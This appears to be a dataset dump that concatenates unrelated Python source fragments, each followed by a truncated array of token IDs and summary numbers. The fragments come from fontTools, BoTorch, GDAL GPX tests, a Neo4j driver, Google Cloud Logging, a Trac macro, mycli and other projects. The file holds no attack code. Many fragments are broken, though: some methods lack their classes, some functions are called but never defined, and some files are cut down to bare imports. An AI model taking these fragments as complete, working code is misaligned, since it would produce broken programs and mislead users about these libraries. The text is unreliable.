If the font attribute is already not None, it is not loaded again. Fonts with the same path are only loaded once and shared among SourceDescriptors. For example, to load UFO sources using defcon: designspace = DesignSpaceDocument.fromfile("path/to/my.designspace") designspace.loadSourceFonts(defcon.Font) Or to load masters as FontTools binary fonts, including extra options: designspace.loadSourceFonts(ttLib.TTFont, recalcBBoxes=False) Args: opener (Callable): takes one required positional argument, the source.path, and an optional list of keyword arguments, and returns a new font object loaded from the path. **kwargs: extra options passed on to the opener function. Returns: List of font objects in the order they appear in the sources list. """ # we load fonts with the same source.path only once loaded = {} fonts = [] for source in self.sources: if source.font is not None: # font already loaded fonts.append(source.font) continue if source.path in loaded: source.font = loaded[source.path] else: if source.path is None: raise DesignSpaceDocumentError( "Designspace source '%s' has no 'path' attribute" % (source.name or "<Unknown>") ) source.font = opener(source.path, **kwargs) loaded[source.path] = source.font fonts.append(source.font) return fonts def getVariableFonts(self) -> List[VariableFontDescriptor]: """Return all variable fonts defined in this document, or implicit variable fonts that can be built from the document's continuous axes. In the case of Designspace documents before version 5, the whole document was implicitly describing a variable font that covers the whole space. In version 5 and above documents, there can be as many variable fonts as there are locations on discrete axes. .. seealso:: :func:`splitInterpolable` .. versionadded:: 5.0 """ if self.variableFonts: return self.variableFonts variableFonts = [] discreteAxes = [] rangeAxisSubsets: List[Union[RangeAxisSubsetDescriptor, ValueAxisSubsetDescriptor]] = [] for axis in self.axes: if isinstance(axis, DiscreteAxisDescriptor): discreteAxes.append(axis) else: rangeAxisSubsets.append(RangeAxisSubsetDescriptor(name=axis.name)) valueCombinations = itertools.product(*[axis.values for axis in discreteAxes]) for values in valueCombinations: basename = None if self.filename is not None: basename = os.path.splitext(self.filename)[0] + "-VF" if self.path is not None: basename = os.path.splitext(os.path.basename(self.path))[0] + "-VF" if basename is None: basename = "VF" axisNames = "".join([f"-{axis.tag}{value}" for axis, value in zip(discreteAxes, values)]) variableFonts.append(VariableFontDescriptor( name=f"{basename}{axisNames}", axisSubsets=rangeAxisSubsets + [ ValueAxisSubsetDescriptor(name=axis.name, userValue=value) for axis, value in zip(discreteAxes, values) ] )) return variableFonts def deepcopyExceptFonts(self): """Allow deep-copying a DesignSpace document without deep-copying attached UFO fonts or TTFont objects. The :attr:`font` attribute is shared by reference between the original and the copy. .. versionadded:: 5.0 """ fonts = [source.font for source in self.sources] try: for source in self.sources: source.font = None res = copy.deepcopy(self) for source, font in zip(res.sources, fonts): res.font = font return res finally: for source, font in zip(self.sources, fonts): source.font = font
[ 6738, 11593, 37443, 834, 1330, 37647, 198, 198, 11748, 17268, 198, 11748, 4866, 198, 11748, 340, 861, 10141, 198, 11748, 10688, 198, 11748, 28686, 198, 11748, 1426, 844, 6978, 198, 6738, 33245, 1330, 2750, 4879, 9399, 11, 10903, 9399, 198...
2.368076
20,129
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from typing import Any, Optional, Tuple import torch from botorch.acquisition.acquisition import AcquisitionFunction from botorch.acquisition.monte_carlo import qSimpleRegret from botorch.acquisition.objective import ConstrainedMCObjective, GenericMCObjective from botorch.acquisition.utils import get_infeasible_cost from botorch.models.model import Model from botorch.utils import ( get_objective_weights_transform, get_outcome_constraint_transforms, ) from botorch.utils.multi_objective.scalarization import get_chebyshev_scalarization from botorch.utils.transforms import squeeze_last_dim from torch import Tensor def get_PosteriorMean( model: Model, objective_weights: Tensor, outcome_constraints: Optional[Tuple[Tensor, Tensor]] = None, X_observed: Optional[Tensor] = None, X_pending: Optional[Tensor] = None, **kwargs: Any, ) -> AcquisitionFunction: r"""Instantiates a PosteriorMean acquisition function. Note: If no OutcomeConstraints given, return an analytic acquisition function. This requires {optimizer_kwargs: {joint_optimization: True}} or an optimizer that does not assume pending point support. Args: objective_weights: The objective is to maximize a weighted sum of the columns of f(x). These are the weights. outcome_constraints: A tuple of (A, b). For k outcome constraints and m outputs at f(x), A is (k x m) and b is (k x 1) such that A f(x) <= b. (Not used by single task models) X_observed: A tensor containing points observed for all objective outcomes and outcomes that appear in the outcome constraints (if there are any). X_pending: A tensor containing points whose evaluation is pending (i.e. that have been submitted for evaluation) present for all objective outcomes and outcomes that appear in the outcome constraints (if there are any). Returns: PosteriorMean: The instantiated acquisition function. """ if X_observed is None: raise ValueError("There are no feasible observed points.") # construct Objective module if kwargs.get("chebyshev_scalarization", False): obj_tf = get_chebyshev_scalarization( weights=objective_weights, Y=squeeze_last_dim(torch.stack(kwargs.get("Ys")).transpose(0, 1)), ) else: obj_tf = get_objective_weights_transform(objective_weights) if outcome_constraints is None: objective = GenericMCObjective(objective=obj_tf) else: con_tfs = get_outcome_constraint_transforms(outcome_constraints) inf_cost = get_infeasible_cost(X=X_observed, model=model, objective=obj_tf) objective = ConstrainedMCObjective( objective=obj_tf, constraints=con_tfs or [], infeasible_cost=inf_cost ) # Use qSimpleRegret, not analytic posterior, to handle arbitrary objective fns. acq_func = qSimpleRegret(model, objective=objective) return acq_func
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 15069, 357, 66, 8, 3203, 11, 3457, 13, 290, 663, 29116, 13, 198, 2, 198, 2, 770, 2723, 2438, 318, 11971, 739, 262, 17168, 5964, 1043, 287, 262, 198, 2, 38559, 24290, 2393, ...
2.7773
1,163
# Copyright 2018 the Autoware Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Co-developed by Tier IV, Inc. and Apex.AI, Inc. import ament_index_python import launch import launch.actions import launch_ros.actions import lidar_integration # Test cases are created automatically by the lidar_integration package. We just need to # instantiate them active = lidar_integration.make_active_tests() after_shutdown = lidar_integration.make_post_shutdown_tests()
[ 2, 15069, 2864, 262, 5231, 322, 533, 5693, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, ...
3.671698
265
# USAGE # python example.py --source images/ocean_sunset.jpg --target images/ocean_day.jpg # import the necessary packages from color_transfer import color_transfer import numpy as np import argparse import cv2 # construct the argument parser and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-s", "--source", required = True, help = "Path to the source image") ap.add_argument("-t", "--target", required = True, help = "Path to the target image") ap.add_argument("-o", "--output", help = "Path to the output image (optional)") args = vars(ap.parse_args()) # load the images source = cv2.imread(args["source"]) target = cv2.imread(args["target"]) # transfer the color distribution from the source image # to the target image transfer = color_transfer(source, target) # check to see if the output image should be saved if args["output"] is not None: cv2.imwrite(args["output"], transfer) # show the images and wait for a key press show_image("Source", source) show_image("Target", target) show_image("Transfer", transfer) cv2.waitKey(0)
[ 2, 1294, 11879, 198, 2, 21015, 1672, 13, 9078, 1377, 10459, 4263, 14, 78, 5829, 62, 19155, 2617, 13, 9479, 1377, 16793, 4263, 14, 78, 5829, 62, 820, 13, 9479, 198, 198, 2, 1330, 262, 3306, 10392, 198, 6738, 3124, 62, 39437, 1330, ...
3.259939
327
import copy import numpy as np import open3d as o3d from tqdm import tqdm from scipy import stats import utils_o3d as utils if __name__ == '__main__': run()
[ 11748, 4866, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 1280, 18, 67, 355, 267, 18, 67, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 6738, 629, 541, 88, 1330, 9756, 198, 198, 11748, 3384, 4487, 62, 78, 18, 67, 3...
2.4
75
#!/usr/bin/env python # -*- encoding: utf-8 -*- # Copyright (c) 2002-2019 "Neo4j," # Neo4j Sweden AB [http://neo4j.com] # # This file is part of Neo4j. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from asyncio import ( IncompleteReadError, Lock, StreamReader, StreamReaderProtocol, StreamWriter, get_event_loop, wait, ) from collections import deque from logging import getLogger from os import strerror from random import choice from ssl import SSLError from sys import platform, version_info from time import perf_counter from neo4j.addressing import Address from neo4j.aio._collections import WaitingList from neo4j.aio._mixins import Addressable, Breakable from neo4j.errors import ( BoltError, BoltConnectionError, BoltSecurityError, BoltConnectionBroken, BoltHandshakeError, Neo4jAvailabilityError, ) from neo4j.api import Version from neo4j.conf import Config, PoolConfig from neo4j.meta import version as neo4j_version from neo4j.routing import RoutingTable log = getLogger(__name__) MAGIC = b"\x60\x60\xB0\x17" async def close(self): """ Close the connection. """ if self.closed: return if not self.broken: log.debug("[#%04X] S: <HANGUP>", self.local_address.port_number) self.__writer.write_eof() self.__writer.close() try: await self.__writer.wait_closed() except BoltConnectionBroken: pass self.__closed = True # async def main(): # from neo4j.debug import watch; watch("neo4j") # neo4j = await Neo4j.open(":17601 :17602 :17603", auth=("neo4j", "password")) # await neo4j.update_routing_table() # print(neo4j.routing_table) # # # if __name__ == "__main__": # run(main())
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 2, 15069, 357, 66, 8, 6244, 12, 23344, 366, 8199, 78, 19, 73, 553, 198, 2, 21227, 19, 73, 10710, 9564, 685, ...
2.626697
884
import os import imp from setuptools import setup, find_packages __version__ = imp.load_source( "hsfs.version", os.path.join("hsfs", "version.py") ).__version__ setup( name="hsfs", version=__version__, install_requires=[ "pyhumps==1.6.1", "requests", "furl", "boto3", "pandas", "numpy", "pyjks", "mock", "avro==1.10.2", "sqlalchemy", "PyMySQL", ], extras_require={ "dev": [ "pytest", "flake8", "black"], "docs": [ "mkdocs==1.1.2", "mkdocs-material==6.2.2", "mike==0.5.5", "sphinx==3.5.4", "keras_autodoc @ git+https://git@github.com/moritzmeister/keras-autodoc@split-tags-properties", "markdown-include"], "hive": ["pyhopshive[thrift]"] }, author="Logical Clocks AB", author_email="moritz@logicalclocks.com", description="HSFS: An environment independent client to interact with the Hopsworks Featurestore", license="Apache License 2.0", keywords="Hopsworks, Feature Store, Spark, Machine Learning, MLOps, DataOps", url="https://github.com/logicalclocks/feature-store-api", download_url="https://github.com/logicalclocks/feature-store-api/releases/tag/" + __version__, packages=find_packages(), long_description=read("../README.md"), long_description_content_type="text/markdown", classifiers=[ "Development Status :: 5 - Production/Stable", "Topic :: Utilities", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Intended Audience :: Developers", ], )
[ 11748, 28686, 198, 11748, 848, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 628, 198, 834, 9641, 834, 796, 848, 13, 2220, 62, 10459, 7, 198, 220, 220, 220, 366, 11994, 9501, 13, 9641, 1600, 28686, 13, 6978, 13, 221...
2.17207
802
#!/usr/bin/env python3 from . import signup, signin, signout, update, info, detail
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 201, 198, 201, 198, 6738, 764, 1330, 1051, 929, 11, 1051, 259, 11, 1051, 448, 11, 4296, 11, 7508, 11, 3703, 201, 198 ]
2.71875
32
# Optional list of dependencies required by the package dependencies = ['torch'] from focal_loss import FocalLoss, focal_loss
[ 2, 32233, 1351, 286, 20086, 2672, 416, 262, 5301, 198, 45841, 3976, 796, 37250, 13165, 354, 20520, 198, 198, 6738, 25397, 62, 22462, 1330, 376, 4374, 43, 793, 11, 25397, 62, 22462, 198 ]
3.848485
33
#!/usr/bin/env python ############################################################################### # $Id$ # # Project: GDAL/OGR Test Suite # Purpose: Test GPX driver functionality. # Author: Even Rouault <even dot rouault at mines dash paris dot org> # ############################################################################### # Copyright (c) 2007, Even Rouault <even dot rouault at mines dash paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. ############################################################################### import os import sys import string sys.path.append( '../pymod' ) import gdaltest import ogrtest import ogr import osr import gdal ############################################################################### # Test waypoints gpx layer. ############################################################################### # Test routes gpx layer. ############################################################################### # Test route_points gpx layer. ############################################################################### # Test tracks gpx layer. ############################################################################### # Test route_points gpx layer. ############################################################################### # Copy our small gpx file to a new gpx file. ############################################################################### # Output extra fields as <extensions>. ############################################################################### # Output extra fields as <extensions>. ############################################################################### # gdaltest_list = [ ogr_gpx_init, ogr_gpx_1, ogr_gpx_2, ogr_gpx_3, ogr_gpx_4, ogr_gpx_5, ogr_gpx_6, # Rerun test 1, 2 and 4 with generated tmp/tmp.gpx ogr_gpx_1, ogr_gpx_2, ogr_gpx_4, ogr_gpx_7, ogr_gpx_8, ogr_gpx_cleanup ] if __name__ == '__main__': gdaltest.setup_run( 'ogr_gpx' ) gdaltest.run_tests( gdaltest_list ) gdaltest.summarize()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 29113, 29113, 7804, 4242, 21017, 198, 2, 720, 7390, 3, 198, 2, 198, 2, 4935, 25, 220, 27044, 1847, 14, 49656, 6208, 26264, 198, 2, 32039, 25, 220, 6208, 14714, 55, 4639, 11244, 13, ...
3.754237
826
# Code Taken from https://github.com/LYH-YF/MWPToolkit # -*- encoding: utf-8 -*- # @Author: Yihuai Lan # @Time: 2021/08/21 04:59:55 # @File: sausolver.py import random import torch from torch import nn import copy from module.Encoder.rnn_encoder import BasicRNNEncoder from module.Embedder.basic_embedder import BasicEmbedder from module.Decoder.tree_decoder import SARTreeDecoder from module.Layer.tree_layers import NodeGenerater, SubTreeMerger, TreeNode, TreeEmbedding from module.Layer.tree_layers import Prediction, GenerateNode, Merge, SemanticAlignmentModule from module.Strategy.beam_search import TreeBeam from loss.masked_cross_entropy_loss import MaskedCrossEntropyLoss, masked_cross_entropy from loss.mse_loss import MSELoss from utils.utils import copy_list from utils.enum_type import NumMask, SpecialTokens
[ 2, 6127, 30222, 422, 3740, 1378, 12567, 13, 785, 14, 11319, 39, 12, 56, 37, 14, 14326, 11571, 970, 15813, 198, 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 2488, 13838, 25, 575, 48406, 1872, 14730, 198, 2, 2...
3.089888
267
import unittest from functools import partial import pandas as pd from pandas.util.testing import assert_frame_equal, assert_series_equal import numpy as np import threading from StringIO import StringIO from rosetta.parallel import parallel_easy, pandas_easy from rosetta.parallel.threading_easy import threading_easy, LockIterateApply # A couple functions for testing parallel easy # Must be defined outside of the test class for some reason. abfunc = partial(_abfunc, 2, 3)
[ 11748, 555, 715, 395, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 198, 11748, 19798, 292, 355, 279, 67, 198, 6738, 19798, 292, 13, 22602, 13, 33407, 1330, 6818, 62, 14535, 62, 40496, 11, 6818, 62, 25076, 62, 40496, 198, 11748, 299,...
3.517986
139
import time import srt import re import datetime from mqtthandler import MQTTHandler INIT_STATUS={ "video": { "title": None, "series_title": None, "season": None, "episode": None }, "time": None, "events": None }
[ 11748, 640, 198, 11748, 264, 17034, 198, 11748, 302, 198, 11748, 4818, 8079, 198, 6738, 285, 39568, 400, 392, 1754, 1330, 337, 48, 51, 4221, 392, 1754, 198, 198, 1268, 2043, 62, 35744, 2937, 34758, 198, 220, 220, 220, 366, 15588, 1298...
2.165289
121
#!/usr/bin/env python import os import numpy as np import pandas as pd os.getcwd() # Request for the filename # Current version of this script works only with TSV type files mainFilename = input('Input your file name (diabetes.tab.txt or housing.data.txt): ') print() # To create proper dataframe, transforming it with numpy # Then changing it with pandas filenameData = np.genfromtxt(mainFilename, dtype='str') filenameData = pd.DataFrame(filenameData) # Obtains first row to identify header is string or numeric headers = filenameData.iloc[0] try: pd.to_numeric(headers) except: filenameData = pd.DataFrame(filenameData.values[1:], columns=headers) # Changes strings to numbers (self identifies for float or integer) filenameData = filenameData.apply(pd.to_numeric) # Obtains the mean and standard deviation of the columns listMean = filenameData.mean() listStd = filenameData.std() print(filenameData) # Prints out the results print('Mean for each column:') for idx in filenameData.columns: print(idx,':',listMean[idx]) print() print('Standard deviation for each column:') for idx in filenameData.columns: print(idx,':',listStd[idx])
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 418, 13, 1136, 66, 16993, 3419, 198, 198, 2, 19390, 329, 262, 29472, 198, 2, 92...
3.148649
370
from donkeycar.parts.web_controller.web import WebSocketCalibrateAPI from functools import partial from tornado import testing import tornado.websocket import tornado.web import tornado.ioloop import json from unittest.mock import Mock from donkeycar.parts.actuator import PWMSteering, PWMThrottle
[ 198, 6738, 50085, 7718, 13, 42632, 13, 12384, 62, 36500, 13, 12384, 1330, 5313, 39105, 9771, 2889, 378, 17614, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 198, 6738, 33718, 1330, 4856, 198, 11748, 33718, 13, 732, 1443, 5459, 198, 117...
3.541176
85
# TracIncludeMacro macros import re import urllib2 from StringIO import StringIO from trac.core import * from trac.wiki.macros import WikiMacroBase from trac.wiki.formatter import system_message from trac.wiki.model import WikiPage from trac.mimeview.api import Mimeview, get_mimetype, Context from trac.perm import IPermissionRequestor from genshi.core import escape from genshi.input import HTMLParser, ParseError from genshi.filters.html import HTMLSanitizer __all__ = ['IncludeMacro']
[ 2, 833, 330, 818, 9152, 14155, 305, 34749, 198, 11748, 302, 198, 11748, 2956, 297, 571, 17, 198, 6738, 10903, 9399, 1330, 10903, 9399, 198, 198, 6738, 491, 330, 13, 7295, 1330, 1635, 198, 6738, 491, 330, 13, 15466, 13, 20285, 4951, ...
2.776596
188
# Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Client for interacting with the Google Stackdriver Logging API.""" import os try: from google.cloud.gapic.logging.v2.config_service_v2_api import ( ConfigServiceV2Api as GeneratedSinksAPI) from google.cloud.gapic.logging.v2.logging_service_v2_api import ( LoggingServiceV2Api as GeneratedLoggingAPI) from google.cloud.gapic.logging.v2.metrics_service_v2_api import ( MetricsServiceV2Api as GeneratedMetricsAPI) from google.cloud.logging._gax import _LoggingAPI as GAXLoggingAPI from google.cloud.logging._gax import _MetricsAPI as GAXMetricsAPI from google.cloud.logging._gax import _SinksAPI as GAXSinksAPI except ImportError: # pragma: NO COVER _HAVE_GAX = False GeneratedLoggingAPI = GAXLoggingAPI = None GeneratedMetricsAPI = GAXMetricsAPI = None GeneratedSinksAPI = GAXSinksAPI = None else: _HAVE_GAX = True from google.cloud.client import JSONClient from google.cloud.environment_vars import DISABLE_GRPC from google.cloud.logging.connection import Connection from google.cloud.logging.connection import _LoggingAPI as JSONLoggingAPI from google.cloud.logging.connection import _MetricsAPI as JSONMetricsAPI from google.cloud.logging.connection import _SinksAPI as JSONSinksAPI from google.cloud.logging.entries import ProtobufEntry from google.cloud.logging.entries import StructEntry from google.cloud.logging.entries import TextEntry from google.cloud.logging.logger import Logger from google.cloud.logging.metric import Metric from google.cloud.logging.sink import Sink _DISABLE_GAX = os.getenv(DISABLE_GRPC, False) _USE_GAX = _HAVE_GAX and not _DISABLE_GAX def _entry_from_resource(self, resource, loggers): """Detect correct entry type from resource and instantiate. :type resource: dict :param resource: one entry resource from API response :type loggers: dict or None :param loggers: A mapping of logger fullnames -> loggers. If not passed, the entry will have a newly-created logger. :rtype: One of: :class:`google.cloud.logging.entries.TextEntry`, :class:`google.cloud.logging.entries.StructEntry`, :class:`google.cloud.logging.entries.ProtobufEntry` :returns: the entry instance, constructed via the resource """ if 'textPayload' in resource: return TextEntry.from_api_repr(resource, self, loggers) elif 'jsonPayload' in resource: return StructEntry.from_api_repr(resource, self, loggers) elif 'protoPayload' in resource: return ProtobufEntry.from_api_repr(resource, self, loggers) raise ValueError('Cannot parse log entry resource') def list_entries(self, projects=None, filter_=None, order_by=None, page_size=None, page_token=None): """Return a page of log entries. See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/entries/list :type projects: list of strings :param projects: project IDs to include. If not passed, defaults to the project bound to the client. :type filter_: str :param filter_: a filter expression. See: https://cloud.google.com/logging/docs/view/advanced_filters :type order_by: str :param order_by: One of :data:`~google.cloud.logging.ASCENDING` or :data:`~google.cloud.logging.DESCENDING`. :type page_size: int :param page_size: maximum number of entries to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of entries. If not passed, the API will return the first page of entries. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.entry.TextEntry`, plus a "next page token" string: if not None, indicates that more entries can be retrieved with another call (pass that value as ``page_token``). """ if projects is None: projects = [self.project] resources, token = self.logging_api.list_entries( projects=projects, filter_=filter_, order_by=order_by, page_size=page_size, page_token=page_token) loggers = {} entries = [self._entry_from_resource(resource, loggers) for resource in resources] return entries, token def sink(self, name, filter_=None, destination=None): """Creates a sink bound to the current client. :type name: str :param name: the name of the sink to be constructed. :type filter_: str :param filter_: (optional) the advanced logs filter expression defining the entries exported by the sink. If not passed, the instance should already exist, to be refreshed via :meth:`Sink.reload`. :type destination: str :param destination: destination URI for the entries exported by the sink. If not passed, the instance should already exist, to be refreshed via :meth:`Sink.reload`. :rtype: :class:`google.cloud.logging.sink.Sink` :returns: Sink created with the current client. """ return Sink(name, filter_, destination, client=self) def list_sinks(self, page_size=None, page_token=None): """List sinks for the project associated with this client. See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/projects.sinks/list :type page_size: int :param page_size: maximum number of sinks to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of sinks. If not passed, the API will return the first page of sinks. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.sink.Sink`, plus a "next page token" string: if not None, indicates that more sinks can be retrieved with another call (pass that value as ``page_token``). """ resources, token = self.sinks_api.list_sinks( self.project, page_size, page_token) sinks = [Sink.from_api_repr(resource, self) for resource in resources] return sinks, token def metric(self, name, filter_=None, description=''): """Creates a metric bound to the current client. :type name: str :param name: the name of the metric to be constructed. :type filter_: str :param filter_: the advanced logs filter expression defining the entries tracked by the metric. If not passed, the instance should already exist, to be refreshed via :meth:`Metric.reload`. :type description: str :param description: the description of the metric to be constructed. If not passed, the instance should already exist, to be refreshed via :meth:`Metric.reload`. :rtype: :class:`google.cloud.logging.metric.Metric` :returns: Metric created with the current client. """ return Metric(name, filter_, client=self, description=description) def list_metrics(self, page_size=None, page_token=None): """List metrics for the project associated with this client. See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/projects.metrics/list :type page_size: int :param page_size: maximum number of metrics to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of metrics. If not passed, the API will return the first page of metrics. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.metric.Metric`, plus a "next page token" string: if not None, indicates that more metrics can be retrieved with another call (pass that value as ``page_token``). """ resources, token = self.metrics_api.list_metrics( self.project, page_size, page_token) metrics = [Metric.from_api_repr(resource, self) for resource in resources] return metrics, token
[ 2, 15069, 1584, 3012, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 921, 743, ...
2.394016
3,977
from __future__ import absolute_import from unittest import TestCase import os import importlib import inspect from plotly.basedatatypes import BasePlotlyType, BaseFigure datatypes_root = "new_plotly/graph_objs" datatype_modules = [ dirpath.replace("/", ".") for dirpath, _, _ in os.walk(datatypes_root) if not dirpath.endswith("__pycache__") ]
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 198, 11748, 28686, 198, 11748, 1330, 8019, 198, 11748, 10104, 198, 198, 6738, 7110, 306, 13, 3106, 265, 265, 9497, 1330, 7308, 43328, 306, 6030...
2.834646
127
import logging from collections import namedtuple from . import export log = logging.getLogger(__name__) NO_QUERY = 0 PARSED_QUERY = 1 RAW_QUERY = 2 SpecialCommand = namedtuple('SpecialCommand', ['handler', 'command', 'shortcut', 'description', 'arg_type', 'hidden', 'case_sensitive']) COMMANDS = {} def show_keyword_help(cur, arg): """ Call the built-in "show <command>", to display help for an SQL keyword. :param cur: cursor :param arg: string :return: list """ keyword = arg.strip('"').strip("'") query = "help '{0}'".format(keyword) log.debug(query) cur.execute(query) if cur.description and cur.rowcount > 0: headers = [x[0] for x in cur.description] return [(None, cur, headers, '')] else: return [(None, None, None, 'No help found for {0}.'.format(keyword))]
[ 11748, 18931, 198, 6738, 17268, 1330, 3706, 83, 29291, 198, 198, 6738, 764, 1330, 10784, 198, 198, 6404, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 198, 198, 15285, 62, 10917, 19664, 796, 657, 198, 27082, 50, 1961, 62, ...
2.527697
343
from abc import ABC, abstractmethod
[ 6738, 450, 66, 1330, 9738, 11, 12531, 24396, 628 ]
4.111111
9
# convert2.py # A program to convert Celsius temps to Fahrenheit. # This version issues heat and cold warnings. main()
[ 2, 10385, 17, 13, 9078, 198, 2, 220, 220, 220, 220, 220, 317, 1430, 284, 10385, 34186, 2169, 862, 284, 35935, 13, 198, 2, 220, 220, 220, 220, 220, 770, 2196, 2428, 4894, 290, 4692, 14601, 13, 198, 198, 12417, 3419 ]
3.146341
41
"""The Wolf SmartSet Service integration.""" from datetime import timedelta import logging from httpx import ConnectError, ConnectTimeout from wolf_smartset.token_auth import InvalidAuth from wolf_smartset.wolf_client import FetchFailed, ParameterReadError, WolfClient from homeassistant.config_entries import ConfigEntry from homeassistant.const import CONF_PASSWORD, CONF_USERNAME from homeassistant.core import HomeAssistant from homeassistant.exceptions import ConfigEntryNotReady from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed from .const import ( COORDINATOR, DEVICE_GATEWAY, DEVICE_ID, DEVICE_NAME, DOMAIN, PARAMETERS, ) _LOGGER = logging.getLogger(__name__) PLATFORMS = ["sensor"]
[ 37811, 464, 8662, 10880, 7248, 4809, 11812, 526, 15931, 198, 6738, 4818, 8079, 1330, 28805, 12514, 198, 11748, 18931, 198, 198, 6738, 2638, 87, 1330, 8113, 12331, 11, 8113, 48031, 198, 6738, 17481, 62, 27004, 2617, 13, 30001, 62, 18439, ...
3.196653
239
# test ld = LevenshteinDistance() ld.solve('kitten','sitting') ld.show()
[ 2, 1332, 198, 335, 796, 1004, 574, 1477, 22006, 45767, 3419, 198, 335, 13, 82, 6442, 10786, 74, 2621, 41707, 82, 2535, 11537, 198, 335, 13, 12860, 3419 ]
2.571429
28
import numpy as np import unittest from pyapprox.benchmarks.spectral_diffusion import ( kronecker_product_2d, chebyshev_derivative_matrix, SteadyStateDiffusionEquation2D, SteadyStateDiffusionEquation1D ) from pyapprox.univariate_polynomials.quadrature import gauss_jacobi_pts_wts_1D import pyapprox as pya if __name__ == "__main__": spectral_diffusion_test_suite = \ unittest.TestLoader().loadTestsFromTestCase(TestSpectralDiffusion2D) unittest.TextTestRunner(verbosity=2).run(spectral_diffusion_test_suite)
[ 11748, 299, 32152, 355, 45941, 198, 11748, 555, 715, 395, 198, 198, 6738, 12972, 1324, 13907, 13, 26968, 14306, 13, 4443, 1373, 62, 26069, 4241, 1330, 357, 198, 220, 220, 220, 479, 33171, 15280, 62, 11167, 62, 17, 67, 11, 1125, 48209,...
2.614634
205
import torch from torch import nn from torch.nn import functional as F from torchdrug import layers
[ 11748, 28034, 198, 6738, 28034, 1330, 299, 77, 198, 6738, 28034, 13, 20471, 1330, 10345, 355, 376, 198, 198, 6738, 28034, 30349, 1330, 11685, 198 ]
4.04
25
#!/usr/bin/env python3 import logging import json import os __author__ = 'adamkoziol'
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 11748, 18931, 198, 11748, 33918, 198, 11748, 28686, 198, 834, 9800, 834, 796, 705, 324, 321, 7204, 89, 1669, 6, 628 ]
2.806452
31
